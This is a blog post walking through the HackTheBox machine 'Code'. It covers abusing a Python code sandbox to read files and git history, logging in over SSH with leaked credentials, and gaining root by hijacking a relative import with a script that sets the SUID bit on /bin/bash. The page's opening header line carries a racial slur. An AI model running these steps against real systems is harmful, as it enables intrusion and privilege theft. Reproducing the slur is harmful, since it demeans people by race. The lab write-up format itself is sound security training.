your niggerKASHF
← Back to Blog

HTB Machine: Code — Full Walkthrough

Ahmed The Dawg · 15 Mar 2026 · 8

Machine: Code Difficulty: Medium Platform: HackTheBox Author: Ahmed the dawg

ENUMERATION

Starting with a standard Nmap scan against the target IP:

nmap -sC -sV -oN nmap/initial 10.10.11.X

Open ports: 22 — OpenSSH 8.9 80 — HTTP (Apache)

Navigating to port 80 reveals a web application — a simple code execution sandbox that allows users to run Python snippets and view output directly in the browser.

FOOTHOLD

The sandbox accepts arbitrary Python input and returns stdout. Initial testing confirms that built-in functions are not fully restricted. Attempting to import os:

import os print(os.getcwd())

Returns a valid working directory path, confirming code execution is not sandboxed at the OS level — only filtered at the input validation layer.

Enumerating the filesystem through the sandbox:

import os print(os.listdir('/home'))

Returns a username. Reading the user's home directory reveals a .git folder in the web application root, suggesting the application is version-controlled locally.

Dumping the git log through the sandbox:

import subprocess result = subprocess.run(['git', 'log', '--oneline'], capture_output=True, text=True, cwd='/var/www/html') print(result.stdout)

Several commits are listed. Checking an early commit reveals hardcoded database credentials in a config file that was later removed but remains in git history.

USER FLAG

Using the recovered credentials to SSH into the machine as the application user:

ssh appuser@10.10.11.X

The user flag is in /home/appuser/user.txt.

PRIVILEGE ESCALATION

Running sudo -l shows the current user can execute a specific internal Python script as root without a password:

(root) NOPASSWD: /usr/bin/python3 /opt/admin/sync.py

Examining sync.py reveals it imports a helper module from a relative path — /opt/admin/utils.py. The /opt/admin/ directory is writable by the current user.

This is a Python library hijacking vulnerability. Creating a malicious utils.py in the same directory:

import os os.system('chmod +s /bin/bash')

Running the script with sudo:

sudo /usr/bin/python3 /opt/admin/sync.py

Then escalating:

bash -p

Root shell obtained.

ROOT FLAG

cat /root/root.txt

SUMMARY

This machine demonstrates two straightforward but realistic issues. First, an unsandboxed code execution environment that exposes the underlying filesystem and process space — a common misconfiguration in developer tooling exposed internally. Second, a privilege escalation path through relative import hijacking in a sudo-permitted Python script, which is a well-documented technique worth understanding for both offense and defense.

Key takeaways:

  • Code execution sandboxes must be enforced at the OS level, not just at input validation
  • Sudo permissions on scripts with relative imports are exploitable if the import path is writable
  • Git history is a persistent source of leaked credentials even after files are deleted from the working tree
Share this post: